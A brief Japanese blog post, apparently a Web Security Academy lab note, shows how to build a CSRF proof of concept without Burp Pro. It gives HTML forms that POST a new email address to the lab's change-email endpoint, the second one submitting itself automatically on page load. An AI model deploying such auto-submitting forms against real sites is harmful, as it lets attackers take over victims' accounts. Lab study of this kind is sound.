Hello there, ('ω')ノ

 

Burp SuiteでPoCを作成する機能は、Pro版でしか使用できず。

例えば、下記のようなラボの機能において。

 

 

メールアドレスを更新する下記のリクエストを送信するPoCを作成する場合は。

 

 

手動であれば、ソースコードからPoCを作成するのですが。

 

 

下記のサイトを利用することに。

 

 

下記が、できあがったPoCで。

 

<html>
    <body>
        <form method="POST" action="https://0a10001904ff8e8680b93f8800e70035.web-security-academy.net/my-account/change-email">
            <input type="hidden" name="email" value="test%40mail.com"/>
            <input type="hidden" name="csrf" value="TYHliNCEGE5k8YHPGDlnn4IrHk4v3QHh"/>
            <input type="submit" value="Submit">
        </form>
    </body>
<html>

 

これを自動で送信したい場合は、scriptを追加するだけで。

 

<html>
    <body>
        <form method="POST" action="https://0a10001904ff8e8680b93f8800e70035.web-security-academy.net/my-account/change-email">
            <input type="hidden" name="email" value="test%40mail.com"/>
            <input type="hidden" name="csrf" value="TYHliNCEGE5k8YHPGDlnn4IrHk4v3QHh"/>
            <input type="submit" value="Submit">
        </form>
        <script>
        document.forms[0].submit();
        </script>

    </body>
</html>

 

Best regards, (^^ゞ